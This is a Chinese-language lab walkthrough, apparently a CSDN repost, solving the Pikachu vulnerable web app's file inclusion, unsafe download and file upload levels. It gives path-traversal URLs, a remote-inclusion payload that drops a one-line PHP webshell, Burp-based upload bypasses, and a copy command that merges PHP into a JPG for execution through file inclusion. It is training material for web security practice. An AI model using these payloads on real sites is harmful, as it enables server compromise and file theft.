标签：文件 .. pikachu jpg filename php 上传 通关

一、文件包含

1、本地文件包含

读取本地域名解析文件

?filename=../../../../Windows/System32/drivers/etc/hosts

---

2、远程文件包含

（1）漏洞分析

        通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。

        注意：远程包含漏洞的前提：如果使用的incldue和require，则需要在phpStudy或php.ini中配置开启下面选项

（2）编写文件名问yijuhua.txt文件执行后让他自己生成木马

（3）payload

?filename=http://127.0.0.1/pikachu-master/test/yijuhua.txt

运行之后生成了一句话木马文件

（4）使用蚁剑进行连接

 

（5）连接成功

 

---

二、文件下载

1、点击kebo进行下载，得到如下连接

http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename=kb.png

2、可以看到是直接通过filename进行读取文件的，那我们来尝试下载在上一页面URL中发现的down_nba.php

http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename=../down_nba.php

果然成功下载，当然还可以通过../../来构造下载其他文件

---

三、文件上传

1、客户端check

（1）在3.jpg写入php代码。

（2）上传文件进行抓包，将3.jpg改为3.php

 

（3）发送到重发器，显示3.php上传成功，然后放包。 

（4）访问该路径：uploads/3.jpg

上传成功。

---

2、服务端check

（1）上传3.jpg时，使用burpsuite进行抓包

（2）将Content-Type改为Content-Type: image/jpeg，将3.jpg改为3.php，然后放包。

显示上传成功

（3）访问该路径uploads/3.php 

---

3、getimagesize()

（1）编写一句话木马2.php。

（2）将1.jpg和2.php放在同一个目录下，然后用cmd执行命令。

copy 1.jpg/b + 2.php/a 3.jpg

新生成的3.jpg就是构造成功的图片木马

（3）将3.jpg进行上传

如果页面报错

 

修改phpstudy版本，修改到php-5.2.17 +Apache

 

再次重新上传，显示上传成功。

（4）访问该路径

uploads/2021/11/18/65186861961c63c4a77679198778.jpg

 没有执行php代码

（5）利用前面的文件包含漏洞可以将图片格式的文件当做php文件来解析执行

Payload

http://localhost/pikachu-master/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2021/11/18/65186861961c63c4a77679198778.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

标签：文件,..,pikachu,jpg,filename,php,上传,通关
来源： https://blog.csdn.net/weixin_46187013/article/details/122277068

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。